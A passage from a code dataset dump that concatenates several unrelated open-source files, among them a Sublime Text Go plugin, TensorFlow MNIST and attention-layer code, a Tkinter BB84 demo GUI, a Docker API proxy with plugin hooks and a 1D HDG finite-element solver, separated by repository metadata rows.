complex_event_static_proxy = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.ComplexEventProxy")()
output_data = unwrapData(complex_event_static_proxy.getOutputData(self._complex_event_proxy))
return output_data
def setOutputData(self, datum, index):
#TODO: Improve logic here by adding support to long. Will need to make a java wrapping for handling long
complex_event_static_proxy = SiddhiLoader._loadType(
"org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.ComplexEventProxy")()
complex_event_static_proxy.setOutputData(self._complex_event_proxy,wrapData(datum),index)
def getTimestamp(self):
return self._complex_event_proxy.getTimestamp()
timestamp = property(fget=getTimestamp, fset=None)
def getAttribute(self, position):
return self._complex_event_proxy.getAttribute(position)
def setAttribute(self, value, position):
#TODO: Improve logic here by adding support to long. Will need to make a java wrapping for handling long
self._complex_event_proxy.setAttribute(value,position)
def getType(self):
raw_type_proxy = self._complex_event_proxy.getType()
type_proxy = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")(raw_type_proxy)
return ComplexEvent.Type._map_value(type_proxy)
def setType(self, type):
self._complex_event_proxy.setType(type.value())
type = property(getType, setType)
| apache-2.0 | -1,473,881,451,016,611,300 | 41.550562 | 139 | 0.675469 | false |
DisposaBoy/GoSublime | gsev.py | 1 | 2415 | from .gosubl import gs
from . import gstest
import sublime
import sublime_plugin
import webbrowser
DOMAIN = 'GsEV'
class EV(sublime_plugin.EventListener):
def on_pre_save(self, view):
view.run_command('gs_fmt')
sublime.set_timeout(lambda: do_set_gohtml_syntax(view), 0)
def on_post_save(self, view):
sublime.set_timeout(lambda: do_post_save(view), 0)
def on_activated(self, view):
win = view.window()
if win is not None:
active_view = win.active_view()
if active_view is not None:
sublime.set_timeout(lambda: do_sync_active_view(active_view), 0)
sublime.set_timeout(lambda: do_set_gohtml_syntax(view), 0)
def on_load(self, view):
sublime.set_timeout(lambda: do_set_gohtml_syntax(view), 0)
class GsOnLeftClick(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
if gs.is_go_source_view(view):
view.run_command('gs9o_open', {
"run": [".actuate", "-button=left"],
"focus_view": False,
"show_view": False,
})
elif view.score_selector(gs.sel(view).begin(), "text.9o") > 0:
view.window().run_command("gs9o_open_selection")
class GsOnRightClick(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
if gs.is_go_source_view(view):
view.run_command('gs9o_open', {
"run": [".actuate", "-button=right"],
"focus_view": False,
"show_view": False,
})
def do_post_save(view):
if not gs.is_pkg_view(view):
return
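# each 'on_save' settings entry is expected to be a dict holding a command
# name and its arguments, e.g. (illustrative only):
# {"cmd": "gs9o_open", "args": {"run": ["go", "vet"]}}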
for c in gs.setting('on_save', []):
cmd = c.get('cmd', '')
args = c.get('args', {})
msg = 'running on_save command %s' % cmd
tid = gs.begin(DOMAIN, msg, set_status=False)
try:
view.run_command(cmd, args)
except Exception as ex:
gs.notice(DOMAIN, 'Error %s' % ex)
finally:
gs.end(tid)
def do_sync_active_view(view):
fn = view.file_name() or ''
gs.set_attr('active_fn', fn)
if fn:
gs.set_attr('last_active_fn', fn)
if fn.lower().endswith('.go'):
gs.set_attr('last_active_go_fn', fn)
win = view.window()
if win is not None and view in win.views():
m = {}
psettings = view.settings().get('GoSublime')
if psettings and gs.is_a(psettings, {}):
m = gs.mirror_settings(psettings)
gs.set_attr('last_active_project_settings', gs.dval(m, {}))
gs.sync_settings()
def do_set_gohtml_syntax(view):
fn = view.file_name()
xl = gs.setting('gohtml_extensions', [])
if xl and fn and fn.lower().endswith(tuple(xl)):
view.set_syntax_file(gs.tm_path('gohtml'))
| mit | -5,356,420,796,553,315,000 | 25.538462 | 68 | 0.657971 | false |
hycis/TensorGraph | examples/mnist_cnn.py | 1 | 6075 | # -*- coding: utf-8 -*-
""" Convolutional Neural Network for MNIST dataset classification task.
References:
Y. LeCun, L. Bottou, Y. Bengio, and P. Haffner. "Gradient-based
learning applied to document recognition." Proceedings of the IEEE,
86(11):2278-2324, November 1998.
Links:
[MNIST Dataset] http://yann.lecun.com/exdb/mnist/
"""
from __future__ import division, print_function, absolute_import
from tensorgraph.layers import Conv2D, RELU, MaxPooling, LRN, Tanh, Dropout, \
Softmax, Flatten, Linear, BatchNormalization
from tensorgraph.utils import same
import tensorgraph as tg
import tensorflow as tf
from tensorgraph.cost import entropy, accuracy
from tensorgraph.dataset import Mnist
from tensorflow.python.framework import ops
def model():
with tf.name_scope('MnistCNN'):
seq = tg.Sequential()
seq.add(Conv2D(num_filters=32, kernel_size=(3, 3), stride=(1, 1), padding='SAME'))
seq.add(BatchNormalization())
seq.add(RELU())
seq.add(MaxPooling(poolsize=(2, 2), stride=(2,2), padding='SAME'))
seq.add(LRN())
seq.add(Conv2D(num_filters=64, kernel_size=(3, 3), stride=(1, 1), padding='SAME'))
seq.add(BatchNormalization())
seq.add(RELU())
seq.add(MaxPooling(poolsize=(2, 2), stride=(2,2), padding='SAME'))
seq.add(LRN())
seq.add(Flatten())
seq.add(Linear(128))
seq.add(BatchNormalization())
seq.add(Tanh())
seq.add(Dropout(0.8))
seq.add(Linear(256))
seq.add(BatchNormalization())
seq.add(Tanh())
seq.add(Dropout(0.8))
seq.add(Linear(10))
seq.add(Softmax())
return seq
def train():
learning_rate = 0.001
batchsize = 32
max_epoch = 300
es = tg.EarlyStopper(max_epoch=max_epoch,
epoch_look_back=3,
percent_decrease=0)
seq = model()
X_train, y_train, X_test, y_test = Mnist(flatten=False, onehot=True, binary=True, datadir='.')
iter_train = tg.SequentialIterator(X_train, y_train, batchsize=batchsize)
iter_test = tg.SequentialIterator(X_test, y_test, batchsize=batchsize)
X_ph = tf.placeholder('float32', [None, 28, 28, 1])
y_ph = tf.placeholder('float32', [None, 10])
y_train_sb = seq.train_fprop(X_ph)
y_test_sb = seq.test_fprop(X_ph)
train_cost_sb = entropy(y_ph, y_train_sb)
test_cost_sb = entropy(y_ph, y_test_sb)
test_accu_sb = accuracy(y_ph, y_test_sb)
# required for BatchNormalization layer
optimizer = tf.train.AdamOptimizer(learning_rate)
update_ops = ops.get_collection(ops.GraphKeys.UPDATE_OPS)
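# run the batch-norm moving mean/variance update ops together with every
# optimizer step; otherwise those statistics would never be updated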
with ops.control_dependencies(update_ops):
train_ops = optimizer.minimize(train_cost_sb)
gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.9)
with tf.Session(config = tf.ConfigProto(gpu_options = gpu_options)) as sess:
init = tf.global_variables_initializer()
sess.run(init)
best_valid_accu = 0
for epoch in range(max_epoch):
print('epoch:', epoch)
pbar = tg.ProgressBar(len(iter_train))
ttl_train_cost = 0
ttl_examples = 0
print('..training')
for X_batch, y_batch in iter_train:
feed_dict = {X_ph:X_batch, y_ph:y_batch}
_, train_cost = sess.run([train_ops,train_cost_sb] , feed_dict=feed_dict)
ttl_train_cost += len(X_batch) * train_cost
ttl_examples += len(X_batch)
pbar.update(ttl_examples)
mean_train_cost = ttl_train_cost/float(ttl_examples)
print('\ntrain cost', mean_train_cost)
ttl_valid_cost = 0
ttl_valid_accu = 0
ttl_examples = 0
pbar = tg.ProgressBar(len(iter_test))
print('..validating')
for X_batch, y_batch in iter_test:
feed_dict = {X_ph:X_batch, y_ph:y_batch}
valid_cost, valid_accu = sess.run([test_cost_sb, test_accu_sb] , feed_dict=feed_dict)
ttl_valid_cost += len(X_batch) * valid_cost
ttl_valid_accu += len(X_batch) * valid_accu
ttl_examples += len(X_batch)
pbar.update(ttl_examples)
mean_valid_cost = ttl_valid_cost/float(ttl_examples)
mean_valid_accu = ttl_valid_accu/float(ttl_examples)
print('\nvalid cost', mean_valid_cost)
print('valid accu', mean_valid_accu)
if best_valid_accu < mean_valid_accu:
best_valid_accu = mean_valid_accu
if es.continue_learning(valid_error=mean_valid_cost, epoch=epoch):
print('epoch', epoch)
print('best epoch last update:', es.best_epoch_last_update)
print('best valid last update:', es.best_valid_last_update)
print('best valid accuracy:', best_valid_accu)
else:
print('training done!')
break
def train_with_trainobject():
from tensorgraph.trainobject import train as mytrain
with tf.Session() as sess:
seq = model()
X_train, y_train, X_test, y_test = Mnist(flatten=False, onehot=True, binary=True, datadir='.')
X_ph = tf.placeholder('float32', [None, 28, 28, 1])
y_ph = tf.placeholder('float32', [None, 10])
y_train_sb = seq.train_fprop(X_ph)
y_test_sb = seq.test_fprop(X_ph)
train_cost_sb = entropy(y_ph, y_train_sb)
optimizer = tf.train.AdamOptimizer(0.001)
test_accu_sb = accuracy(y_ph, y_test_sb)
mytrain(session=sess,
feed_dict={X_ph:X_train, y_ph:y_train},
train_cost_sb=train_cost_sb,
valid_cost_sb=-test_accu_sb,
optimizer=optimizer,
epoch_look_back=5, max_epoch=100,
percent_decrease=0, train_valid_ratio=[5,1],
batchsize=64, randomize_split=False)
if __name__ == '__main__':
# train()
train_with_trainobject()
| apache-2.0 | 4,008,166,205,503,598,000 | 37.694268 | 102 | 0.587819 | false |
DQE-Polytech-University/HI | src/console2.py | 1 | 2564 | from tkinter import *
import numpy as np
import math
import Classes as hi
def Insert():
name = text1.get()
Text1.insert(END, name)
text1.delete(0,END)
def Key_issue():
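# BB84-style exchange (see Classes.Various_measurement): run the protocol,
# compare Alice's and Bob's bases and derive the shared key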
bases = text1.get()
long_message = text2.get()
bb84 = hi.Various_measurement(int(bases),int(long_message),0)
bb84.begin()
bb84.compare_bob_alice()
bb84.generate_key()
key = bb84.key
Text1.insert(END, key)
#text.delete(0,END)
root = Tk()
root.title('Encrypt me =P')
root.resizable(False, False)
root.geometry('800x550')
text1 = Entry(root, bg = 'white')
text2 = Entry(root, bg = 'white')
Text1 = Listbox(root,height=15,width=35,bd=0)
Text2 = Listbox(root,height=15,width=35,bd=0)
listbox1=Listbox(root,height=6,width=20,selectmode=EXTENDED)
list1=["Hadamard","NOT","Gate_pi","Gate_pi8","Gate_turn","CNOT"]
for i in list1:
listbox1.insert(END,i)
listbox1.pack()
listbox1.place(x=400, y=35)
post_user = Text(root,height=10,width=32,font='Arial 14',wrap=WORD)
Text1.pack()
Text2.pack()
text1.pack()
text2.pack()
post_user.pack()
text1.place(x=230, y=10)
text2.place(x=230, y=40)
Text1.place(x=400, y= 270)
Text2.place(x=550, y= 270)
post_user.place(x=5, y= 270)
#scrollbar['command'] = Text2.xview
#Text2['yscrollcommand'] = scrollbar.set
def delete():
    Text1.delete(0, END)
    Text2.delete(0, END)
Button1 = Button(root, text="Enter the number of bases:", width=30)
Button2 = Button(root, text="Enter the length of the message:", width=30)
Button3 = Button(root, text="Encrypt message", width=30)
Button4 = Button(root, text="Issue key", width=30, command=Key_issue)
Button5 = Button(root, text="Decrypt message", width=30)
Button6 = Button(root, text="Clear all items", width=30, command=delete)
Button7 = Button(root, text='Exit', width=30, command=root.destroy)
Button9 = Button(root, text="Enter your message:", width=30,bg='green',fg='white')
Button10 = Button(root, text="Our keys:", width=16)
Button11 = Button(root, text="The encrypted message:", width=30)
Button8 = Button(root, text="Select gate:", width=16)
Button1.pack()
Button2.pack()
Button3.pack()
Button4.pack()
Button5.pack()
Button6.pack()
Button7.pack()
Button8.pack()
Button9.pack()
Button10.pack()
Button11.pack()
Button1.place(x=0, y=5)
Button2.place(x=0, y=35)
Button3.place(x=0, y=65)
Button4.place(x=0, y=95)
Button5.place(x=0, y=125)
Button6.place(x=0, y=155)
Button7.place(x=0, y=185)
Button9.place(x=0, y=235)
Button10.place(x=400, y=235)
Button11.place(x=550, y=235)
Button8.place(x=400, y=5)
root.mainloop()
| mit | -945,591,217,603,901,400 | 22.522936 | 82 | 0.688768 | false |
cilium-team/powerstrip | powerstrip/powerstrip.py | 1 | 14164 | from ._config import PluginConfiguration
from ._parser import EndpointParser
from treq.client import HTTPClient
from twisted.internet import reactor, defer
from twisted.internet.interfaces import IHalfCloseableProtocol
from twisted.python import log
from twisted.python.failure import Failure
from twisted.web import server, proxy
from twisted.web.client import Agent
from twisted.web.resource import Resource
from twisted.web.server import NOT_DONE_YET
from urllib import quote as urlquote
from zope.interface import directlyProvides
import StringIO
import json
import treq
import urlparse
class NoPostHooks(Exception):
"""
Do not run any post-hooks, because of an incompatible Docker response type
(streaming/hijacked or chunked).
"""
class DockerProxyClient(proxy.ProxyClient):
"""
An HTTP proxy which knows how to break HTTP just right so that Docker
stream (attach/events) API calls work.
self.http: A boolean which reflects whether the connection is in HTTP mode
(True) or "hijack" mode (False). See
https://docs.docker.com/reference/api/docker_remote_api_v1.14/#32-hijacking
"""
http = True
_streaming = False
_listener = None
_responsePartBuffer = b""
def _fireListener(self, result):
if self._listener is not None:
d = self._listener
self._listener = None
d.callback(result)
def setStreamingMode(self, streamingMode):
"""
Allow anyone with a reference to us to toggle on/off streaming mode.
Useful when we have no post-hooks (and no indication from Docker that
it's sending packets of JSON e.g. with build) and we want to avoid
buffering slow responses in memory.
"""
self._streaming = streamingMode
if streamingMode:
self._fireListener(Failure(NoPostHooks()))
def registerListener(self, d):
"""
Register a one shot listener, which can fire either with:
* Failure(NoPostHooks()) if the proxy is handling comms back to
the client (streaming/chunked modes), or
* A tuple containing the (response, code, content-type).
"""
self._listener = d
def _handleRawStream(self):
"""
Switch the current connection to be a "hijacked" aka raw stream: one
where bytes just get naively proxied back and forth.
"""
def loseWriteConnectionReason(reason):
# discard the reason, for compatibility with readConnectionLost
self.transport.loseWriteConnection()
self.father.transport.readConnectionLost = loseWriteConnectionReason
directlyProvides(self.father.transport, IHalfCloseableProtocol)
self.http = False
self.father.transport.write(
"HTTP/1.1 200 OK\r\n"
"Content-Type: application/vnd.docker.raw-stream\r\n"
"\r\n")
def stdinHandler(data):
self.transport.write(data)
self.father.transport.protocol.dataReceived = stdinHandler
self.setStreamingMode(True)
def handleHeader(self, key, value):
if (key.lower() == "content-type" and
value == "application/vnd.docker.raw-stream"):
self._handleRawStream()
return proxy.ProxyClient.handleHeader(self, key, value)
def handleResponsePart(self, buffer):
"""
If we're not in streaming mode, buffer the response part(s).
"""
if self._streaming:
proxy.ProxyClient.handleResponsePart(self, buffer)
else:
self._responsePartBuffer += buffer
def handleResponseEnd(self):
"""
If we're completing a chunked response, up-call to handle it like a
regular reverse proxy.
If we're completing a non-chunked response, fire the post-hooks.
If we're completing a hijacked response, pass through the connection
close.
"""
if self.http:
if self._streaming:
return proxy.ProxyClient.handleResponseEnd(self)
else:
contentType = self.father.responseHeaders.getRawHeaders("content-type")
if contentType:
contentType = contentType[0]
else:
contentType = None
body = self._responsePartBuffer
self._fireListener(
{"PowerstripProtocolVersion": 1,
"ModifiedServerResponse":
{"Body": body,
"Code": self.father.code,
"ContentType": contentType}})
else:
self.father.transport.loseConnection()
def rawDataReceived(self, data):
if self.http:
return proxy.ProxyClient.rawDataReceived(self, data)
self.father.transport.write(data)
class DockerProxyClientFactory(proxy.ProxyClientFactory):
protocol = DockerProxyClient
_listener = None
def onCreate(self, d):
self._listener = d
def _fireListener(self, result):
if self._listener is not None:
d = self._listener
self._listener = None
d.callback(result)
def buildProtocol(self, addr):
client = proxy.ProxyClientFactory.buildProtocol(self, addr)
self._fireListener(client)
return client
def clientConnectionFailed(self, connector, reason):
connector.connect()
class DockerProxy(proxy.ReverseProxyResource):
proxyClientFactoryClass = DockerProxyClientFactory
def __init__(self, dockerAddr=None, dockerPort=None, dockerSocket=None,
path='', reactor=reactor, config=None):
"""
A docker proxy resource which knows how to connect to real Docker
daemon either via socket (dockerSocket specified) or address + port for
TCP connection (dockerAddr + dockerPort specified).
"""
if config is None:
# Try to get the configuration from the default place on the
# filesystem.
self.config = PluginConfiguration()
else:
self.config = config
self.config.read_and_parse()
self.parser = EndpointParser(self.config)
Resource.__init__(self)
self.host = dockerAddr
self.port = dockerPort
self.socket = dockerSocket
self.path = path
self.reactor = reactor
proxy.ReverseProxyResource.__init__(self, dockerAddr, dockerPort, path, reactor) # NB dockerAddr is not actually used
self.agent = Agent(reactor) # no connectionpool
self.client = HTTPClient(self.agent)
def render(self, request, reactor=reactor):
# We are processing a leaf request.
# Get the original request body from the client.
skipPreHooks = False
if request.requestHeaders.getRawHeaders('content-type') == ["application/json"]:
originalRequestBody = request.content.read()
request.content.seek(0) # hee hee
elif request.requestHeaders.getRawHeaders('content-type') == ["application/tar"]:
# We can't JSON encode binary data, so don't even try.
skipPreHooks = True
originalRequestBody = None
else:
originalRequestBody = None
preHooks = []
postHooks = []
d = defer.succeed(None)
for endpoint in self.parser.match_endpoint(request.method, request.uri.split("?")[0]):
# It's possible for a request to match multiple endpoint
# definitions. Order of matched endpoint is not defined in
# that case.
adapters = self.config.endpoint(endpoint)
preHooks.extend(adapters.pre)
postHooks.extend(adapters.post)
def callPreHook(result, hookURL):
if result is None:
newRequestBody = originalRequestBody
newRequestRequest = request.uri
else:
newRequestBody = result["ModifiedClientRequest"]["Body"]
newRequestRequest = result["ModifiedClientRequest"]["Request"]
return self.client.post(hookURL, json.dumps({
"PowerstripProtocolVersion": 1,
"Type": "pre-hook",
"ClientRequest": {
"Method": request.method,
"Request": newRequestRequest,
"Body": newRequestBody,
}
}), headers={'Content-Type': ['application/json']})
if not skipPreHooks:
for preHook in preHooks:
hookURL = self.config.adapter_uri(preHook)
d.addCallback(callPreHook, hookURL=hookURL)
d.addCallback(treq.json_content)
def doneAllPrehooks(result):
# Finally pass through the request to actual Docker. For now we
# mutate request in-place in such a way that ReverseProxyResource
# understands it.
if result is not None:
requestBody = b""
bodyFromAdapter = result["ModifiedClientRequest"]["Body"]
request.uri = result["ModifiedClientRequest"]["Request"].encode("utf-8")
if bodyFromAdapter is not None:
requestBody = bodyFromAdapter.encode("utf-8")
request.content = StringIO.StringIO(requestBody)
request.requestHeaders.setRawHeaders(b"content-length",
[str(len(requestBody))])
###########################
# The following code is copied from t.w.proxy.ReverseProxy so that
# clientFactory reference can be kept.
if not self.socket:
if self.port == 80:
host = self.host
else:
host = "%s:%d" % (self.host, self.port)
request.requestHeaders.setRawHeaders(b"host", [host])
request.content.seek(0, 0)
rest = request.uri
allRequestHeaders = request.getAllHeaders()
if allRequestHeaders.get("transfer-encoding") == "chunked":
del allRequestHeaders["transfer-encoding"]
# XXX Streaming the contents of the request body into memory could
# cause OOM issues for large build contexts POSTed through
# powerstrip. See https://github.com/ClusterHQ/powerstrip/issues/51
body = request.content.read()
allRequestHeaders["content-length"] = str(len(body))
clientFactory = self.proxyClientFactoryClass(
request.method, rest, request.clientproto,
allRequestHeaders, body, request)
###########################
if self.socket:
self.reactor.connectUNIX(self.socket, clientFactory)
else:
self.reactor.connectTCP(self.host, self.port, clientFactory)
d = defer.Deferred()
clientFactory.onCreate(d)
return d
d.addCallback(doneAllPrehooks)
def inspect(client):
# If there are no post-hooks, allow the response to be streamed
# back to the client, rather than buffered.
d = defer.Deferred()
client.registerListener(d)
if not postHooks:
client.setStreamingMode(True)
return d
d.addCallback(inspect)
def callPostHook(result, hookURL):
serverResponse = result["ModifiedServerResponse"]
return self.client.post(hookURL, json.dumps({
# TODO Write tests for the information provided to the adapter.
"PowerstripProtocolVersion": 1,
"Type": "post-hook",
"ClientRequest": {
"Method": request.method,
"Request": request.uri,
"Body": originalRequestBody,
},
"ServerResponse": {
"ContentType": serverResponse["ContentType"],
"Body": serverResponse["Body"],
"Code": serverResponse["Code"],
},
}), headers={'Content-Type': ['application/json']})
# XXX Need to skip post-hooks for tar archives from e.g. docker export.
# https://github.com/ClusterHQ/powerstrip/issues/52
for postHook in postHooks:
hookURL = self.config.adapter_uri(postHook)
d.addCallback(callPostHook, hookURL=hookURL)
d.addCallback(treq.json_content)
def sendFinalResponseToClient(result):
resultBody = result["ModifiedServerResponse"]["Body"].encode("utf-8")
# Update the Content-Length, since we're modifying the request object in-place.
request.responseHeaders.setRawHeaders(
b"content-length",
[str(len(resultBody))]
)
# Write the final response to the client.
request.write(resultBody)
request.finish()
d.addCallback(sendFinalResponseToClient)
def squashNoPostHooks(failure):
failure.trap(NoPostHooks)
d.addErrback(squashNoPostHooks)
d.addErrback(log.err, 'while running chain')
return NOT_DONE_YET
def getChild(self, path, request):
fragments = request.uri.split("/")
fragments.pop(0)
proxyArgs = (self.host, self.port, self.socket, self.path + '/' + urlquote(path, safe=""),
self.reactor)
#if not request.postpath:
resource = DockerProxy(*proxyArgs, config=self.config)
return resource
class ServerProtocolFactory(server.Site):
def __init__(self, dockerAddr=None, dockerPort=None, dockerSocket=None, config=None):
self.root = DockerProxy(dockerAddr, dockerPort, dockerSocket, config=config)
server.Site.__init__(self, self.root)
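# Minimal usage sketch: one way this factory might be wired up with the Twisted
# reactor. The socket path and listening port below are assumptions, as is the
# presence of a plugin configuration file at the default location expected by
# PluginConfiguration; this is illustrative only, not the project's own entry point.
if __name__ == '__main__':
    factory = ServerProtocolFactory(dockerSocket='/var/run/docker.sock')
    reactor.listenTCP(2375, factory)
    reactor.run()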
| apache-2.0 | 5,407,781,511,916,936,000 | 40.294461 | 125 | 0.592912 | false |
ashtonteng/squad_exp | AttentionLayer.py | 1 | 3451 | import tensorflow as tf
from tensorflow.contrib import rnn
import numpy as np
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"]="2"
class AttentionLayer():
"""Implements Context-to-Query Attention. Pays attention to different parts of the query when
reading the passage. Returns, for each word in the passage, a weighted vector of questions."""
def __init__(self, args, p_inputs, q_inputs, scope):
"""p_inputs: batch_size x p_length x hidden_size"""
"""q_inputs: batch_size x q_length x hidden_size"""
print("building attention layer", scope)
batch_size = args.batch_size
vocab_size = args.vocab_size
hidden_size = args.AttentionLayer_size
model = args.model
num_layers = args.num_layers
training = args.training
with tf.name_scope(scope):
p_inputs_shape = tf.shape(p_inputs)
q_inputs_shape = tf.shape(q_inputs)
p_length = p_inputs_shape[1]
q_length = q_inputs_shape[1]
p_inputs_aug = tf.tile(tf.expand_dims(p_inputs, 2), [1, 1, q_length, 1]) #batch_size x p_length x q_length x hidden_size
q_inputs_aug = tf.tile(tf.expand_dims(q_inputs, 1), [1, p_length, 1, 1]) #batch_size x p_length x q_length x hidden_size
pq_elementwise = tf.multiply(p_inputs_aug, q_inputs_aug) #batch_size x p_length x q_length x hidden_size
combo_input = tf.concat([p_inputs_aug, q_inputs_aug, pq_elementwise], axis=3) #batch_size x p_length x q_length x 3*hidden_size
with tf.variable_scope(scope):
w_sim = tf.get_variable("w_sim", [3*hidden_size, 1])
#in order to matmul combo_input with w_sim, we need to first tile w_sim batch_size number of times, and flatten combo_input
combo_input_flat = tf.reshape(combo_input, [batch_size, -1, 3*hidden_size]) #batch_size x p_length*q_length x 3*hidden_size
w_sim_tiled = tf.tile(tf.expand_dims(w_sim, 0), [batch_size, 1, 1]) #batch_size x 3*hidden_size x 1
sim_mtx_flat = tf.matmul(combo_input_flat, w_sim_tiled) #batch_size x p_length*q_length x 1
sim_mtx = tf.reshape(sim_mtx_flat, [batch_size, p_length, q_length, 1]) #batch_size x p_length x q_length x 1
#C2Q attention: how relevant are the query words to each context word?
#a #for each p, find weights to put on q. ##batch_size x p_length x q_length x hidden_size
att_on_q = tf.nn.softmax(sim_mtx, dim=2)
#q_inputs_aug = batch_size x p_length x q_length x hidden_size
weighted_q = tf.multiply(att_on_q, q_inputs_aug)
linear_combo_q_for_each_p = tf.reduce_sum(weighted_q, axis=2) #batch_size x p_length x hidden_size
#Q2C Attention: which context words have the closest similarity to one of the query words?
#for each context word choose which query word it helps contribute to the most
#then normalize over all context words, to get a distribution of helpfulness of all context words to this query
att_on_p = tf.nn.softmax(tf.reduce_max(sim_mtx, axis=2), dim=1) #batch_size x p_length x 1
weighted_p = tf.multiply(att_on_p, p_inputs) #batch_size x p_length x hidden_size
self.outputs = tf.concat([p_inputs, linear_combo_q_for_each_p, tf.multiply(p_inputs, linear_combo_q_for_each_p), tf.multiply(p_inputs, weighted_p)], axis=2)
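# Minimal usage sketch (TF 1.x graph mode). The _Args container and every
# dimension below are assumptions made only for this example; the real project
# presumably builds its own args object and feeds encoder outputs rather than
# raw placeholders.
if __name__ == '__main__':
    class _Args(object):
        batch_size = 32
        vocab_size = 10000
        AttentionLayer_size = 128
        model = 'lstm'
        num_layers = 1
        training = True
    _args = _Args()
    # Passage and question encodings: batch_size x length x hidden_size.
    _p = tf.placeholder('float32', [_args.batch_size, None, _args.AttentionLayer_size])
    _q = tf.placeholder('float32', [_args.batch_size, None, _args.AttentionLayer_size])
    _att = AttentionLayer(_args, _p, _q, scope='attention_demo')
    # outputs: batch_size x p_length x 4*hidden_size
    print(_att.outputs)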
| mit | -5,947,735,938,825,889,000 | 55.57377 | 168 | 0.637496 | false |
asdf123101/HDPG1D | hdpg1d/adaptation.py | 1 | 8070 | import numpy as np
from numpy import concatenate as cat
from scipy.sparse import csr_matrix
import scipy.sparse.linalg as spla
from copy import copy
import matplotlib.pyplot as plt
import warnings
from .preprocess import shape, discretization, boundaryCondition
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
# supress the deprecation warning
warnings.filterwarnings("ignore", ".*GUI is implemented.*")
class hdpg1d(object):
"""
1D HDG solver
"""
def __init__(self, coeff):
self.numEle = coeff.numEle
self.numBasisFuncs = coeff.pOrder + 1
self.coeff = coeff
self.mesh = np.linspace(0, 1, self.numEle + 1)
self.enrichOrder = 1
self.primalSoln = None
self.adjointSoln = None
self.estErrorList = [[], []]
self.trueErrorList = [[], []]
def separateSoln(self, soln):
"""Separate gradState (q and u), stateFace from the given soln"""
gradState, stateFace = np.split(
soln, [len(soln) - self.numEle + 1])
return gradState, stateFace
def plotState(self, counter):
"""Plot solution u with smooth higher oredr quadrature"""
stateSmooth = np.array([])
stateNode = np.zeros(self.numEle + 1)
xSmooth = np.array([])
gradState, _ = self.separateSoln(self.primalSoln)
halfLenState = int(len(gradState) / 2)
state = gradState[halfLenState:2 * halfLenState]
# quadrature rule
gorder = 10 * self.numBasisFuncs
xi, wi = np.polynomial.legendre.leggauss(gorder)
shp, shpx = shape(xi, self.numBasisFuncs)
for j in range(1, self.numEle + 1):
xSmooth = np.hstack((xSmooth, (self.mesh[(j - 1)] + self.mesh[j]) / 2 + (
self.mesh[j] - self.mesh[j - 1]) / 2 * xi))
stateSmooth = np.hstack(
(stateSmooth, shp.T.dot(state[(j - 1) * self.numBasisFuncs:j * self.numBasisFuncs])))
stateNode[j - 1] = state[(j - 1) * self.numBasisFuncs]
stateNode[-1] = state[-1]
plt.figure(1)
plt.plot(xSmooth, stateSmooth, '-', color='C3')
plt.plot(self.mesh, stateNode, 'C3.')
plt.xlabel('$x$', fontsize=17)
plt.ylabel('$u$', fontsize=17)
# plt.axis([-0.05, 1.05, 0, 1.3])
plt.grid()
plt.pause(5e-1)
def meshAdapt(self, index):
"""Given the index list, adapt the mesh"""
inValue = np.zeros(len(index))
for i in np.arange(len(index)):
inValue[i] = (self.mesh[index[i]] +
self.mesh[index[i] - 1]) / 2
self.mesh = np.sort(np.insert(self.mesh, 0, inValue))
def solvePrimal(self):
"""Solve the primal problem"""
        if hasattr(self, 'matLocal'):
            # if matLocal exists,
            # only change the mesh instead of initializing again
            self.matLocal.mesh = self.mesh
        else:
            self.matLocal = discretization(self.coeff, self.mesh)
        matGroup = self.matLocal.matGroup()
A, B, _, C, D, E, F, G, H, L, R = matGroup
# solve by exploiting the local global separation
K = -cat((C.T, G), axis=1)\
.dot(np.linalg.inv(np.bmat([[A, -B], [B.T, D]]))
.dot(cat((C, E)))) + H
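        # The statement above assembles the statically condensed (Schur
        # complement) system for the face unknowns:
        #   K = H - [C^T  G] [A  -B; B^T  D]^{-1} [C; E]
        # so that K * stateFace = F_hat solved below.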
sK = csr_matrix(K)
F_hat = np.array([L]).T - cat((C.T, G), axis=1)\
.dot(np.linalg.inv(np.bmat([[A, -B], [B.T, D]])))\
.dot(np.array([cat((R, F))]).T)
def invRHS(vec):
"""Construct preconditioner"""
matVec = spla.spsolve(sK, vec)
return matVec
n = len(F_hat)
preconditioner = spla.LinearOperator((n, n), invRHS)
stateFace = spla.gmres(sK, F_hat, M=preconditioner)[0]
# stateFace = np.linalg.solve(K, F_hat)
gradState = np.linalg.inv(np.asarray(np.bmat([[A, -B], [B.T, D]]))).dot(
cat((R, F)) - cat((C, E)).dot(stateFace))
self.primalSoln = cat((gradState, stateFace))
def solveAdjoint(self):
"""Solve the adjoint problem"""
# solve in the enriched space
_coeff = copy(self.coeff)
_coeff.pOrder = _coeff.pOrder + 1
        if hasattr(self, 'matAdjoint'):
            self.matAdjoint.mesh = self.mesh
        else:
            self.matAdjoint = discretization(_coeff, self.mesh)
        matGroup = self.matAdjoint.matGroup()
A, B, _, C, D, E, F, G, H, L, R = matGroup
# add adjoint LHS conditions
F = np.zeros(len(F))
R[-1] = -boundaryCondition('adjoint')[1]
# assemble global matrix LHS
LHS = np.bmat([[A, -B, C],
[B.T, D, E],
[C.T, G, H]])
sLHS = csr_matrix(LHS)
RHS = cat((R, F, L))
# solve in one shoot using GMRES
def invRHS(vec):
"""Construct preconditioner"""
matVec = spla.spsolve(sLHS, vec)
return matVec
n = len(RHS)
preconditioner = spla.LinearOperator((n, n), invRHS)
soln = spla.gmres(sLHS, RHS, M=preconditioner)[0]
# soln = np.linalg.solve(LHS.T, RHS)
self.adjointSoln = soln
def DWResidual(self):
        if hasattr(self, 'matResidual'):
            self.matResidual.mesh = self.mesh
        else:
            self.matResidual = discretization(
                self.coeff, self.mesh, self.enrichOrder)
        matGroup = self.matResidual.matGroup()
A, B, BonQ, C, D, E, F, G, H, L, R = matGroup
LHS = np.bmat([[A, -B, C],
[BonQ, D, E]])
RHS = cat((R, F))
residual = np.zeros(self.numEle)
numEnrich = self.numBasisFuncs + self.enrichOrder
adjointGradState, adjointStateFace = self.separateSoln(
self.adjointSoln)
for i in np.arange(self.numEle):
primalResidual = (LHS.dot(self.primalSoln) - RHS).A1
uLength = self.numEle * numEnrich
